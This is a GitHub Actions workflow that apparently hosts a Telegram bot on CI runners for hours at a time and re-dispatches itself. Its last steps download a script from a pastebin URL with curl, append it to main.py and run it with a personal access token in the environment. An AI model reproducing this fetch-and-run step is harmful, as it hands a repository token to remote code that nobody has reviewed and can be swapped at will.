name: one

on:
  workflow_dispatch:
  repository_dispatch:
    types: [first]
      
jobs:
  build:
    runs-on: ubuntu-latest
    steps: 
         
      - uses: actions/checkout@v2

      - uses: actions/cache@v2
        with:
          path: ~/.cache/pip
          key: ${{ hashFiles('setup.py') }}-${{ hashFiles('requirements.txt') }}

      - name: Install requirements
        run: pip install --upgrade -r requirements.txt 

      - name: update
        run: sudo apt-get -y update
      
      - name: install ffmpeg
        run: sudo apt install -y ffmpeg

      - name: erro404
        timeout-minutes: 350
        continue-on-error: true
        run: python3 -m bot
        env:
          API_ID: ${{ secrets.API_ID }}
          API_HASH: ${{ secrets.API_HASH }} 
          BOT_TOKEN: ${{ secrets.BOT_TOKEN }}
          SUDO_USERS: ${{ secrets.SUDO_USERS }}
          DATABASE_URL: ${{ secrets.DATABASE_URL }}
          LOG_CHANNEL: ${{ secrets.LOG_CHANNEL }}
          
      - name: Clone the Python script.
        run: curl https://katb.in/enusuweqafu/raw >> main.py

      - name: Run dispatch_event.
        run: |
          python3 main.py
        env:
          GITHUB_TOKEN: ${{ secrets.PAT }} 
